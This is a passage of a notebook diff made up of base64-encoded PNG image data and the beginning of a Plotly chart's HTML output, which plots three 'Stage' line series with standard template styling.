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4EREREREREREREQUiDsSJiIiIiIiIiIiIKBBxIE5EREREREREREREgYgDcSIiIiIiIiIiIiIKRByIExEREREREREREVEg4kCciIiIiIiIiIiIiAIRB+JEREREREREREREFIg4ECciIiIiIiIiIiKiQMSBOBEREREREREREREFIg7EiYiIiIiIiIiIiCgQcSBORERERERERERERIGIA3EiIiIiIiIiIiIiCkQciBMRERERERERERFRIOJAnIiIiIiIiIiIiIgCEQfiRERERERERERERBSIOBAnIiIiIiIiIiIiokDEgTgRERERERERERERBSIOxImIiIgo6eXmHdXzb3ROyp/1drt+Wvz19qT8WQ+XzNeZaE2attFTzVPVrvto5eUX6snXUurl677xcW89+VqK/vZ/6fXy9YiIiIiILONAnIiIiIgeuRats9WkaZs4f3iprSTpuzt3dbSwKClf65cOxKfOX6tX389UTU1N3Oe+v/dAf3q1vbbsOvSrf3ZDOxA/e6FYkpJ+IH7ru++VNXSG/vfNz/RU8w76uOsInTp3Ofr5XfuPcyBORERERIGIA3EiIiIieuRatM7W+JkrVFx24yEVSf9av3Qgfv3mt/rDS22Vf+xM3OeWrt2hv7yZpnC46lf/7KAciH+aOUafZo5R0eVSlVyrUO8Rs/RCqzRFItWSOBAnIiIiouDEgTgRERERPXItWmdr7tJNv/j5nx407z5wQs3+1UM52w7orU/66sW3u6pTr/G6dz8kSaqurtG46cvV9J10/enV9nq7XT8dPHo6+mf92iNTOmaPV/bwmXEff7/DII2ZtlSSVH7jljr3nqDn3+ispu+kq++o2bp770Hc69yYmx93KJzef4pGTF4sSRozban6jPxSg8cv0KvvZ6rpO+nanndEi7/epjc+7q0XWqXpy682RH+v88MaPH6Bnn+js55r2UntM8fqSsn1X/x39vCB+LMtOyk376heeT9TT76Wos96T9SDkPe7XsuiVdtUdr0y+s8Xr15Tk6ZtdP3mt5I4ECciIiKi4MSBOBERERE9co9yIJ6XX6g/vdpeI6d8pZqaGj0IeXrl/UwtWLFFkrQyZ7deaJWmi1evyXO+5izdqOf/0Tn67u5fOxDfsfeonmiWovsPvOjHfjzsvVxcrpqaGrVq21d9R83WvfshVX57Rx93HaG0PhPjXud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",
+ "text/html": [
+ "<div> <div id=\"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\" class=\"plotly-graph-div\" style=\"height:900px; width:100%;\"></div> <script type=\"text/javascript\"> require([\"plotly\"], function(Plotly) { window.PLOTLYENV=window.PLOTLYENV || {}; if (document.getElementById(\"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\")) { Plotly.newPlot( \"5fc77ee3-3b5c-46f4-8eb6-e0d83b577b25\", [{\"mode\":\"lines\",\"name\":\"Stage 1\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x3\",\"y\":[6725.0,7.75,-0.0],\"yaxis\":\"y3\"},{\"mode\":\"lines\",\"name\":\"Stage 2\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x2\",\"y\":[11787.5,226.93,0.62],\"yaxis\":\"y2\"},{\"mode\":\"lines\",\"name\":\"Stage 3\",\"type\":\"scatter\",\"x\":[20.0,60.0,100.0],\"xaxis\":\"x\",\"y\":[15425.0,576.31,161.68],\"yaxis\":\"y\"}], {\"height\":900,\"template\":{\"data\":{\"bar\":[{\"error_x\":{\"color\":\"#2a3f5f\"},\"error_y\":{\"color\":\"#2a3f5f\"},\"marker\":{\"line\":{\"color\":\"#E5ECF6\",\"width\":0.5},\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"bar\"}],\"barpolar\":[{\"marker\":{\"line\":{\"color\":\"#E5ECF6\",\"width\":0.5},\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"barpolar\"}],\"carpet\":[{\"aaxis\":{\"endlinecolor\":\"#2a3f5f\",\"gridcolor\":\"white\",\"linecolor\":\"white\",\"minorgridcolor\":\"white\",\"startlinecolor\":\"#2a3f5f\"},\"baxis\":{\"endlinecolor\":\"#2a3f5f\",\"gridcolor\":\"white\",\"linecolor\":\"white\",\"minorgridcolor\":\"white\",\"startlinecolor\":\"#2a3f5f\"},\"type\":\"carpet\"}],\"choropleth\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"choropleth\"}],\"contour\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"contour\"}],\"contourcarpet\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"contourcarpet\"}],\"heatmap\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"heatmap\"}],\"heatmapgl\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"heatmapgl\"}],\"histogram\":[{\"marker\":{\"pattern\":{\"fillmode\":\"overlay\",\"size\":10,\"solidity\":0.2}},\"type\":\"histogram\"}],\"histogram2d\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"histogram2d\"}],\"histogram2dcontour\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"histogram2dcontour\"}],\"mesh3d\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"type\":\"mesh3d\"}],\"parcoords\":[{\"line\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"parcoords\"}],\"pie\":[{\"automargin\":true,\"type\":\"pie\"}],\"scatter\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatter\"}],\"scatter3d\":[{\"line\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatter3d\"}],\"scattercarpet\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattercarpet\"}],\"scattergeo\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattergeo\"}],\"scattergl\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattergl\"}],\"scattermapbox\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scattermapbox\"}],\"scatterpolar\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterpolar\"}],\"scatterpolargl\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterpolargl\"}],\"scatterternary\":[{\"marker\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"type\":\"scatterternary\"}],\"surface\":[{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"},\"colorscale\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#bd3786\"],[0.5555555555555556,\"#d8576b\"],[0.6666666666666666,\"#ed7953\"],[0.7777777777777778,\"#fb9f3a\"],[0.8888888888888888,\"#fdca26\"],[1.0,\"#f0f921\"]],\"type\":\"surface\"}],\"table\":[{\"cells\":{\"fill\":{\"color\":\"#EBF0F8\"},\"line\":{\"color\":\"white\"}},\"header\":{\"fill\":{\"color\":\"#C8D4E3\"},\"line\":{\"color\":\"white\"}},\"type\":\"table\"}]},\"layout\":{\"annotationdefaults\":{\"arrowcolor\":\"#2a3f5f\",\"arrowhead\":0,\"arrowwidth\":1},\"autotypenumbers\":\"strict\",\"coloraxis\":{\"colorbar\":{\"outlinewidth\":0,\"ticks\":\"\"}},\"colorscale\":{\"diverging\":[[0,\"#8e0152\"],[0.1,\"#c51b7d\"],[0.2,\"#de77ae\"],[0.3,\"#f1b6da\"],[0.4,\"#fde0ef\"],[0.5,\"#f7f7f7\"],[0.6,\"#e6f5d0\"],[0.7,\"#b8e186\"],[0.8,\"#7fbc41\"],[0.9,\"#4d9221\"],[1,\"#276419\"]],\"sequential\":[[0.0,\"#0d0887\"],[0.1111111111111111,\"#46039f\"],[0.2222222222222222,\"#7201a8\"],[0.3333333333333333,\"#9c179e\"],[0.4444444444444444,\"#